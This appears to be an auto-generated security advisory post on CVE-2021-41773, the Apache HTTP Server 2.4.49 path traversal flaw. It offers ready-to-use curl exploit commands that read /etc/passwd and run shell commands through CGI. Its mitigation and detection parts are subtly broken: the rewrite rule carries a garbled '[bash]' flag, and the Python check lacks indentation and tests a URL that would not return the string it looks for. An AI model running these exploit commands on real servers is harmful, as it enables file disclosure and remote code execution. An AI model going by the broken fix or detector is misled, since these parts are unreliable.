How the CVE Works:
CVE-2021-41773 is a critical vulnerability in Apache HTTP Server 2.4.49, caused by improper path normalization. Attackers exploit a flaw in the `ap_normalize_path()` function, allowing traversal outside restricted directories using crafted URLs (e.g., /icons/.%%32%65/). If `Require all granted` is misconfigured, this leads to arbitrary file disclosure. Further exploitation enables RCE via CGI scripts. The issue stems from incomplete checks for URL-encoded characters (%2e, %5c), permitting access to unintended files.
DailyCVE Form:
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Analytics:
- Affects 2.4.49 only; patched in 2.4.50.
- Exploits surged within 24 hours of disclosure.
- Shodan shows ~200k vulnerable servers pre-patch.
Exploit Commands:
1. File Disclosure:
curl -v "http://target/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
2. RCE (if CGI enabled):
curl -X POST "http://target/cgi-bin/.%2e/%2e%2e/bin/sh" -d "echo;id"
Mitigation Commands:
1. Patch Upgrade:
sudo apt update && sudo apt upgrade apache2 -y
2. Temp Fix (mod_rewrite):
RewriteEngine On RewriteRule "../" "-" [bash]
Detection Code (Python):
import requests
vuln_url = "http://target/icons/.%%32%65/"
response = requests.get(vuln_url)
if response.status_code == 200 and "root:x:" in response.text:
print("[!] Vulnerable to CVE-2021-41773")
Protection Steps:
1. Disable `mod_cgi` if unused.
2. Enforce `Require all denied` in untrusted directories.
3. Audit logs for `/%2e` or `/..` patterns.
References:
- Apache Patch: https://httpd.apache.org/security/vulnerabilities_24.html
- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2021-41773
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
